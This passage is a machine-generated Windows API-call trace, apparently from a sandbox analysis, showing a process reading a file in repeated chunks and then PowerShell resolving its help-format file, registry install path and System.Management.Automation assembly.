lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.850] GetLastError () returned 0x0 [0052.850] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.850] GetLastError () returned 0x0 [0052.850] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.850] GetLastError () returned 0x0 [0052.850] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.850] GetLastError () returned 0x0 [0052.850] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.851] GetLastError () returned 0x0 [0052.851] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.851] GetLastError () returned 0x0 [0052.853] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.853] GetLastError () returned 0x0 [0052.853] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.853] GetLastError () returned 0x0 [0052.853] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.853] GetLastError () returned 0x0 [0052.854] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.854] GetLastError () returned 0x0 [0052.854] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.854] GetLastError () returned 0x0 [0052.854] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.854] GetLastError () returned 0x0 [0052.854] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.854] GetLastError () returned 0x0 [0052.854] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.854] GetLastError () returned 0x0 [0052.854] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.854] GetLastError () returned 0x0 [0052.854] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.855] GetLastError () returned 0x0 [0052.855] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.855] GetLastError () returned 0x0 [0052.855] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.855] GetLastError () returned 0x0 [0052.855] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.855] GetLastError () returned 0x0 [0052.855] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.855] GetLastError () returned 0x0 [0052.855] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.855] GetLastError () returned 0x0 [0052.855] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.855] GetLastError () returned 0x0 [0052.859] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.859] GetLastError () returned 0x0 [0052.859] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.859] GetLastError () returned 0x0 [0052.859] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.859] GetLastError () returned 0x0 [0052.860] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.860] GetLastError () returned 0x0 [0052.860] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.860] GetLastError () returned 0x0 [0052.860] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.860] GetLastError () returned 0x0 [0052.860] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.860] GetLastError () returned 0x0 [0052.860] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.860] GetLastError () returned 0x0 [0052.860] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.860] GetLastError () returned 0x0 [0052.861] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.861] GetLastError () returned 0x0 [0052.861] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.861] GetLastError () returned 0x0 [0052.861] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.861] GetLastError () returned 0x0 [0052.861] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.861] GetLastError () returned 0x0 [0052.861] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.861] GetLastError () returned 0x0 [0052.861] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.861] GetLastError () returned 0x0 [0052.862] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.862] GetLastError () returned 0x0 [0052.862] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.862] GetLastError () returned 0x0 [0052.862] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.862] GetLastError () returned 0x0 [0052.862] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.862] GetLastError () returned 0x0 [0052.862] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.862] GetLastError () returned 0x0 [0052.862] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.862] GetLastError () returned 0x0 [0052.862] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.863] GetLastError () returned 0x0 [0052.863] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.863] GetLastError () returned 0x0 [0052.863] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.863] GetLastError () returned 0x0 [0052.863] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.863] GetLastError () returned 0x0 [0052.863] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.863] GetLastError () returned 0x0 [0052.863] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.863] GetLastError () returned 0x0 [0052.863] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.863] GetLastError () returned 0x0 [0052.864] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.864] GetLastError () returned 0x0 [0052.864] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.864] GetLastError () returned 0x0 [0052.864] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0xf37, lpOverlapped=0x0) returned 1 [0052.864] GetLastError () returned 0x0 [0052.864] ReadFile (in: hFile=0x2f8, lpBuffer=0x25213b7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x25213b7*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.864] GetLastError () returned 0x0 [0052.864] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.864] GetLastError () returned 0x0 [0052.864] CloseHandle (hObject=0x2f8) returned 1 [0052.864] GetLastError () returned 0x0 [0052.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0052.864] GetLastError () returned 0x0 [0052.864] SetErrorMode (uMode=0x1) returned 0x1 [0052.864] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2542cdc | out: lpFileInformation=0x2542cdc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0052.865] GetLastError () returned 0x0 [0052.865] SetErrorMode (uMode=0x1) returned 0x1 [0052.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0052.865] GetLastError () returned 0x0 [0052.865] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.865] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.865] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.865] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0052.865] GetLastError () returned 0x0 [0052.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0052.865] GetLastError () returned 0x0 [0052.873] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x752cfc2, Data2=0x8578, Data3=0x4d69, Data4=([0]=0xa5, [1]=0xb7, [2]=0x33, [3]=0x1c, [4]=0xab, [5]=0xe8, [6]=0x7d, [7]=0xfb))) returned 0x0 [0052.873] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xe6ba308a, Data2=0x9145, Data3=0x4741, Data4=([0]=0xbd, [1]=0xf9, [2]=0x5b, [3]=0xd3, [4]=0xa5, [5]=0xc0, [6]=0x8, [7]=0x6c))) returned 0x0 [0052.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.873] GetLastError () returned 0x0 [0052.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.873] GetLastError () returned 0x0 [0052.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.873] GetLastError () returned 0x0 [0052.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.873] GetLastError () returned 0x0 [0052.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.898] GetLastError () returned 0x0 [0052.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.898] GetLastError () returned 0x0 [0052.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.898] GetLastError () returned 0x0 [0052.899] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xfafd8fe9, Data2=0xd7b4, Data3=0x4209, Data4=([0]=0x9a, [1]=0xa6, [2]=0xfc, [3]=0x35, [4]=0xef, [5]=0xa3, [6]=0xae, [7]=0xb6))) returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: 